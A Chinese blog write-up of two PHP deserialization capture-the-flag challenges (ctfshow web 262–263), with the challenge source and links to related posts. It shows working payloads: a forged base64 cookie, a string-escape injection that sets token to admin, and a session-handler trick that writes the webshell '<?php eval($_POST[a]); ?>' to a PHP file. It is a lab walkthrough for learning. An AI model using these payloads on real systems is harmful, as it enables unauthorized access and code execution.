Web反序列化 262~263详解

已于 2023-01-05 18:44:35 修改
阅读量1.2k 收藏 1
点赞数 1
文章标签: web安全
于 2022-11-19 20:54:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64297700/article/details/127929353
版权

什么是反序列化?

  • 简单来说:序列化就是指将对象转换为字符串的过程,而反序列化则是将字符串还原为对象的过程;

  • 打个比方

    假如说我在淘宝上买了一张桌子,我们都知道桌子是比较大的,不好快递给我们,所以就会把它拆分成小部件,拆分的过程就类似于序列化的过程,当我收到货后,就又需要把这些小部件拼成大桌子,这个过程就是反序列的过程;

web反序列化 262-263

反序列化魔术方法

	__construct(): 当对象创建时触发;
	__destruct(): 当对象销毁时触发;
	__toString(): 当对象被当作字符串时触发;
	__wakeup(): 当使用unserialize时触发;
	__sleep(): 当使用serialize时触发;
	__destruct(): 当对象被销毁时触发;
	__call(): 在对象上下文中调用不可访问的方法时触发;
	__callStatic(): 在静态上下文中调用不可访问的方法时触发;
	__get(): 用于从不可访问的属性读取数据;
	__set (): 用于将数据写入不可访问的属性;
	__isset(): 在不可访问的属性上调用isset()empty()触发;
	__unset(): 在不可访问的属性上使用unset()时触发;
	__toString(): 把类当作字符串使用时触发,返回值需要为字符串;
	__invoke(): 当尝试将对象调用为函数时触发;
262_字符逃逸

打开靶场查看index.php;

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-03 02:37:19
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-03 16:05:38
# @message.php
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
	
error_reporting(0);
class message{
    public $from;
    public $msg;
    public $to;
    public $token='user';
    public function __construct($f,$m,$t){	//__construct():当对象创建时触发;
        $this->from = $f;
        $this->msg = $m;
        $this->to = $t;
    }
}
	
	$f = $_GET['f'];
	$m = $_GET['m'];
	$t = $_GET['t'];
	
if(isset($f) && isset($m) && isset($t)){
    $msg = new message($f,$m,$t);
    $umsg = str_replace('fuck', 'loveU', serialize($msg));
    setcookie('msg',base64_encode($umsg));
    echo 'Your message has been sent';
}

highlight_file(__FILE__);
?>

通过index.php注释发现message.php;

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-03 15:13:03
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-03 15:17:17
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

highlight_file(__FILE__);
include('flag.php');

class message{
    public $from;
    public $msg;
    public $to;
    public $token='user';
    public function __construct($f,$m,$t){	//__construct():当对象创建时触发;
        $this->from = $f;
        $this->msg = $m;
        $this->to = $t;
    }
}

if(isset($_COOKIE['msg'])){
    $msg = unserialize(base64_decode($_COOKIE['msg']));
    if($msg->token=='admin'){
        echo $flag;
    }
}
?>

寻找flag相关信息,发现message.php有include('flag.php'),查看后面代码发现当token=admin时,可以输出flag;

if(isset($_COOKIE['msg'])){
    $msg = unserialize(base64_decode($_COOKIE['msg']));
    if($msg->token=='admin'){
        echo $flag;
}
方法一
  • Poc:直接对token=admin进行序列化即可;
<?php
class message{
		public $from;
		public $msg;
		public $to;	//这三个变量可有可无;
    	public $token='admin'; //给token赋值为admin;
}
$a=new message();
echo base64_encode(serialize($a));
?>

Payload

	Tzo3OiJtZXNzYWdlIjo0OntzOjQ6ImZyb20iO047czozOiJtc2ciO047czoyOiJ0byI7TjtzOjU6InRva2VuIjtzOjU6ImFkbWluIjt9
  • 按F12,修改cookie值名称为msg,再输入值;

在这里插入图片描述

  • 再访问message.php即可得到flag;

在这里插入图片描述

方法二
  • 查看index.php页面发现有个字符串替换,会将fuck替换为loveU,记住是在序列化之后才进行替换,可以利用该替换构造序列化;
if(isset($f) && isset($m) && isset($t)){
    $msg = new message($f,$m,$t);
    $umsg = str_replace('fuck', 'loveU', serialize($msg));
    setcookie('msg',base64_encode($umsg));
    echo 'Your message has been sent';
}
  • 打开PHP在线工具尝试构造序列化,由于__costrust方法不会对token值初始化,所以需要构造token=admin的序列化,利用字符替换;
<?php
class message{
    public $from;
    public $msg;
    public $to;
    //public $token='user';
	public $token='admin';
	public function __construct($f,$m,$t){
		$this->from = $f;
		$this->msg = $m;
		$this->to = $t;
	}
}
$msg= new message('1','2','fuck');
$umsg = str_replace('fuck', 'loveU', serialize($msg));
echo serialize($umsg);
?>
//替换前结果: O:7:"message":4:{s:4:"from";s:1:"1";s:3:"msg";s:1:"2";s:2:"to";s:4:"fuck";s:5:"token";s:5:"admin";}";
//替换后结果: O:7:"message":4:{s:4:"from";s:1:"1";s:3:"msg";s:1:"2";s:2:"to";s:4:"loveU";s:5:"token";s:5:"admin";}";
  • 这里说明一下,假如说t=fuck,fuck长度是4,序列化后自然也是4,但是序列化后的fuck被替换为loveU,而loveU长度是5,因为是序列化之后替换的,其实际内容长度是5,这样就相当于可以多输入一个字符去满足替换后的实际长度5,也就是说我们每次多输入一个fuck就可以多输入一个可控字符,而需要构造的token=admin的序列化";s:5:"token";s:5:"admin";}长度为27,如果输入27个fuck,那不就正好可以把token=admin的序列化给写进去了嘛,可能有点不太好理解,多去操作几次会更好理解一点;(注:"是为了闭合前面)
<?php
class message{
    public $f='1';
    public $m='2';
    public $t='fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:5:"token";s:5:"admin";}';
}

$msg = new message();
$umsg = str_replace('fuck', 'loveU', serialize($msg));
echo serialize($umsg);
?>
//结果: O:7:"message":4:{s:4:"from";s:1:"1";s:3:"msg";s:1:"2";s:2:"to";s:135:"loveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveU";s:5:"token";s:5:"admin";}

Payload

	?f=1&m=2&t=fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:5:"token";s:5:"admin";}

在这里插入图片描述

  • 根据提示信息,再访问一下message.php即可得到flag;

在这里插入图片描述

263_session伪造

在这里插入图片描述

  • 打开登录页面index.php;
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-03 16:28:37
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-06 19:21:45
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
session_start();
//超过5次禁止登陆
if(isset($_SESSION['limit'])){
	$_SESSION['limti']>5?die("登陆失败次数超过限制"):$_SESSION['limit']=base64_decode($_COOKIE['limit']);
	$_COOKIE['limit'] = base64_encode(base64_decode($_COOKIE['limit']) +1);
}else{
	 setcookie("limit",base64_encode('1'));
	 $_SESSION['limit']= 1;
}
?>
  • 查看inc.php发现file_put_contents危险函数,$this->username=$username,$this->password=$password为可控点,可以写入一个webshell;
<?php
error_reporting(0);
ini_set('display_errors', 0);
ini_set('session.serialize_handler', 'php');
date_default_timezone_set("Asia/Shanghai");
session_start();
use \CTFSHOW\CTFSHOW; 
require_once 'CTFSHOW.php';
$db = new CTFSHOW([
    'database_type' => 'mysql',
    'database_name' => 'web',
    'server' => 'localhost',
    'username' => 'root',
    'password' => 'root',
    'charset' => 'utf8',
    'port' => 3306,
    'prefix' => '',
    'option' => [
        PDO::ATTR_CASE => PDO::CASE_NATURAL
    ]
]);

// sql注入检查
function checkForm($str){
    if(!isset($str)){
        return true;
    }else{
    return preg_match("/select|update|drop|union|and|or|ascii|if|sys|substr|sleep|from|where|0x|hex|bin|char|file|ord|limit|by|\`|\~|\!|\@|\#|\\$|\%|\^|\\|\&|\*|\(|\)|\(|\)|\+|\=|\[|\]|\;|\:|\'|\"|\<|\,|\>|\?/i",$str);
    }
}

class User{
    public $username;
    public $password;
    public $status;
    function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }
    function setStatus($s){
        $this->status=$s;
    }
    function __destruct(){
        file_put_contents("log-".$this->username, "使用".$this->password."登陆".($this->status?"成功":"失败")."----".date_create()->format('Y-m-d H:i:s'));
    }
}
?>
  • 登录检查页面check.php;
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-03 16:59:10
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-06 19:15:38
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
require_once 'inc/inc.php';
$GET = array("u"=>$_GET['u'],"pass"=>$_GET['pass']);
if($GET){
	$data= $db->get('admin',
	[	'id',
		'UserName0'
	],[
		"AND"=>[
		"UserName0[=]"=>$GET['u'],
		// "PassWord1[=]"=>$GET['pass'] //密码必须为128位大小写字母+数字+特殊符号,防止爆破
		]
	]);
	if($data['id']){
		//登陆成功取消次数累计
		$_SESSION['limit']= 0;
		echo json_encode(array("success","msg"=>"欢迎您".$data['UserName0']));
	}else{
		//登陆失败累计次数加1
		$_COOKIE['limit'] = base64_encode(base64_decode($_COOKIE['limit'])+1);
		echo json_encode(array("error","msg"=>"登陆失败"));
	}
}
?>
  • 主要因为session.serialize_handler对session处理方式的不同,引起了该反序列化;
例如:
<?php
	session_start();
	if(!isset($_SESSION['username'])){
		$_SESSION['username'] = 'xianzhi';
	}
?>

  • php_serialize处理时内容为:

      a:1:{s:8:"username";s:7:"xianzhi";}

  • php处理时内容为:

      username|s:7:"xianzhi";

由于php与php_serialize处理方式的不同,在php处理方式下,只会读取 | 后面的内容作为session值,同理,如果构造一个webshell的序列化那不就可以拿到flag了嘛;

大致思路如下

  • 寻找可控点,发现session值会等于cookie传入的值,而cookie可控的,说明session也是可控的,可以通过file_put_contents函数写入一个webshell;
  • 将写入的webshell序列化,利用处理方式的不同,在php处理的方式下将序列化的结果写入session值里,也就相,访问该木马文件即可找到flag;

Poc

<?php
class User{
    public $username = '1.php';	//在inc.php里设置了文件名拼接,记得添加"log-";
    public $password = '<?php eval($_POST[a]); ?>'; //提示:flag在phpinfo里;
}
$user = new User();
echo(base64_encode('|'.serialize($user)));
?>

Payload

	fE86NDoiVXNlciI6Mjp7czo4OiJ1c2VybmFtZSI7czo1OiIxLnBocCI7czo4OiJwYXNzd29yZCI7czoyNToiPD9waHAgZXZhbCgkX1BPU1RbYV0pOyA/PiI7fQ==
  • 修改limit值,修改后刷新;

在这里插入图片描述

  • 接下来访问check.php,写入webshell(有个疑惑,传不传参都可以成功写入,可能是系统bug);

在这里插入图片描述

  • 最后访问log-1.php,根据提示在phpinfo里面找flag;

在这里插入图片描述

个人觉得web反序列化262~263不太好理解,所以就单独写了这两个的解析,开始也不太理解,然后花了一些时间才慢慢搞懂这两个反序列化,我们一定要多去思考整理出思路,再按照这个思路去动手操作,如果还不太理解263的小伙伴们,建议看下以下这篇文章PHP session反序列化,希望会有帮助哟!

以上就是web反序列化262~263的解析,如有还不太理解或有其他想法的小伙伴们都可以私信我或评论区打出来哟,如有写的不好的地方也请大家多多包涵一下,我也会慢慢去改进和提高的,记得走之前别忘了点个赞哟😁!

橘猫的饼干798
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[系统安全] 五十八.恶意软件分析 (10)利用火绒安全实现恶意样本家族批量标注(含学术探讨)
杨秀璋的专栏
04-26 371
前文介绍了利用MS Defender实现恶意样本家族批量标注。这篇文章将讲解如何利用火绒实现恶意样本家族批量标注,在通过VS、VT采集批量样本后,通常需要样本家族标注,如何准确识别家族类别至关重要,其将为后续的恶意软件家族分类或溯源提供帮助。在此感谢李师弟热心的指导和帮助,基础性基础,希望您喜欢,且看且珍惜。
各种音视频编解码学习详解 h264 ,mpeg4 ,aac 等所有音视频格式
tianyu的专栏 - Linux site:blog.csdn.net/wishfly
12-05 3950
编解码学习笔记(一):基本概念 媒体业务是网络的主要业务之间。尤其移动互联网业务的兴起,在运营商和应用开发商中,媒体业务份量极重,其中媒体的编解码服务涉及需求分析、应用开发、释放license收费等等。最近因为项目的关系,需要理清媒体的codec,比较搞的是,在豆丁网上看运营商的规范 标准,同一运营商同样的业务在不同文档中不同的要求,而且有些要求就我看来应当是历史的延续,也就是现在已经很
CTF_Web反序列化学习笔记(二)CTF经典考题由浅至深
AFCC_的博客(Web_Dog)
08-16 6551
0x00 CTF中的反序列化题目 这类题目中主要是利用反序列化各种魔术方法的绕过或调用,从而构造符合条件的序列化字符串,完成特定的功能,在这一点上对于整个代码段的执行流程要很清楚。我们先从最简单的开始看起。 0x01 攻防世界unserialize3 题目显示的源码为: class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 在这里我们可以看到只有一个魔术方法,而__w
web序列化与反序列化
张山山#的博客
05-19 1156
此文章只是web小白对序列化的简单了解与认识,没有深入内容
web反序列化漏洞原理_CVE-2017-3248——WebLogic反序列化初探_零开始网络安全技巧
程序员六七的博客
07-16 566
安全客 - 安全资讯平台
13.反序列化
qq_45926195的博客
10-31 215
13.1什么是反序列化 就是把一个对象变成可以传输的字符串,目的就是为了方便传输。假设,我们写了一个class,这个class里面存有一些变量。当这个class被实例化了之后,在使用过程中里面的一些变量值发生了改变。以后在某些时候还会用到这个变量,如果我们让这个class一直不销毁,等着下一次要用它的时候再一次被调用的话,浪费系统资源。当我们写一个小型的项目可能没有太大的影响,但是随着项目的壮大,一些小问题被放大了之后就会产生很多麻烦。这个时候PHP就和我们说,你可以把这个对象序列化了,存成一个字符串..
[Web/基础/反序列化]反序列化轻量总结
車鈊的博客
10-12 430
文章目录反序列化序列化和反序列化序列化是什么?魔术方法三种类型的变量的表示方法(public,protected,private)基本反序列化破坏__Wakeup失效反序列化写链其他形式反序列化SESSION反序列化Session原理其反序列化字符逃逸Python反序列化`Phar`反序列化什么是`Phar`文件?`Phar`结构那么思路是什么呢?一些限制框架反序列化 反序列化 序列化和反序列化 序列化是什么? 我们在运行程序时变量是存在于内存当中的,为了保存他们,我们可以将其转化为有确定格式的、可传输、可
三、Web漏洞-反序列化
weixin_70557959的博客
05-11 3993
37、WEB漏洞-反序列化之PHP(上) 原理 PHP 反序列化原理: 1.未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化过程,从而导致代码执行,SQL 注入,目录遍历等不可控后果。 2.其实跟文件解析差不多,都是由于传递的恶意参数被执行(序列化和反序列化相当于加解密过程) 3.在反序列化的过程中自动触发了某些魔术方法。当进行反序列化的时候就有可能会触发对象中的一些魔术方法。 ---序列化函数:serialize() //将一个对象转换成一个字符串 ...
WEB应用(十六)---反序列化
最新发布
2302_78820467的博客
08-09 693
web学习第十六篇
J2EE应用开发详解
03-31
406 20.3 系统设计 407 20.3.1 系统用例分析 407 20.3.2 持久化数据分析 413 20.3.3 系统操作序列描述 413 20.3.4 业务接口设计 419 20.4 数据库设计 421 20.4.1 数据库规划 421 20.4.2 具体数据库表 423 20.4.3 SQL...
《深入体验Java Web开发内幕——核心基础》目录
热门推荐
张孝祥专栏
05-14 1万+
第1章 XML基础.................................................................................................................. 1... 指点迷津:什么是配置文件1.1 认知XML..............................................
RTSP/RTP/RTCP详解整理
EricFantastic
10-09 8200
RTSP:实时流协议(Real Time Streaming Protocol) RTSP的请求主要有DESCRIBE、SETUP、PLAY、PAUSE、TEARDOWN、OPTIONS等,顾名思义可以知道起对话和控制作用,RTSP的对话过程中SETUP可以确定RTP/RTCP使用的端口,PLAY/PAUSE/TEARDOWN可以开始或者停止RTP的发送,等等。 作为一个应用层协议,RTSP提
CVE-2017-10271 Weblogic反序列化漏洞补丁(FMJJ) 自己已经打上补丁了。欢迎下载
02-24
weblogic 补丁 反序列化补丁 。己已经打上补丁了。欢迎下载
web安全入门(第九章-4)反序列化
Yzz_的博客
06-07 339
一、什么是序列化 1,定义 简单的说:将php中对象、类、数组、变量、匿名函数等,转化为字符串, 方便保存到数据库或者文件中 //将状态信息保存为字符串 2,什么是反序列化 //将字符串保存为状态信息 3,类与对象 ~类与对象 在次说一下, 类就是代表一种物体的总称,比如猫类,狗类,鱼类等等 对象就是类的具体体现,比如狗类的拉布拉多犬 举例: 人这个“类”,张三是类具体的人,即对象 这里的类就是“人”,张三就是“对象” ~类得初始化,即要给“类”赋予
WEB反序列化漏洞(更新中)
weixin_45844670的博客
09-08 748
安全反序列化0x00 前言0x01 什么是序列化?0x02 序列化与反序列化0x03什么是不安全反序列化?0x04不安全反序列化漏洞如何产生?0x05不安全反序列化有何影响?0x06利用反序列化漏洞如何识别不安全反序列化PHP序列化格式Java序列化格式处理序列化对象修改对象属性 0x00 前言 在本文中,我们将介绍什么是不安全反序列化,并描述它如何使网站可能遭受高强度攻击。我们将重点介绍典型方案,并使用PHP,Ruby和Java反序列化的具体示例演示一些广泛适用的技术。我们还将研究一些方法,
『JavaWeb』序列化和反序列化
叄拾叄画生
01-13 565
什么是序列化和反序列化?什么时候需要序列化?实现序列化的方式。如何实现序列化?静态属性是否被序列化?SerialVersionUID。总结。
web反序列化漏洞原理/反序列化漏洞防护-详细白客笔记
程序员三九的博客
07-14 317
常见组件漏洞的利用原理及流量特征分析(2)1、反序列化漏洞1.1、Apache Shiro漏洞(框架漏洞)Apache Shiro是一种功能强大且易于使用的Java安全框架
Web题目实操反序列化基础知识理解
Z11762的博客
04-23 711
(5)同时,因为private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。此题前面需要经过多次尝试,包括注入点和类型,发现判断是大多命令都是出错,不能得到想要的信息,多次尝试才发现是过滤了,用到了绕过过滤的方法,总只需要细心,多次尝试各种命令才能得到有用回显,才能一步步爆出想要的数据。
CTFshow-WEB入门-反序列化
feng的博客
02-14 5558
前言 简单的反序列化直接给出payload,有意思的,较为复杂的和我不太会的会分析一波。 web254 ?username=xxxxxx&password=xxxxxx web255 <?php class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=true; } echo urlencode(serialize(new ctfShowUser())
Java对象序列化与反序列化详解
"Java对象的序列化与反序列化技术详解" Java对象的序列化与反序列化是Java编程中的一项重要技术,它允许我们将Java对象转换为字节流,以便于存储或在网络中传输。这章内容主要涵盖以下几个方面: 1. **对象序列化...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值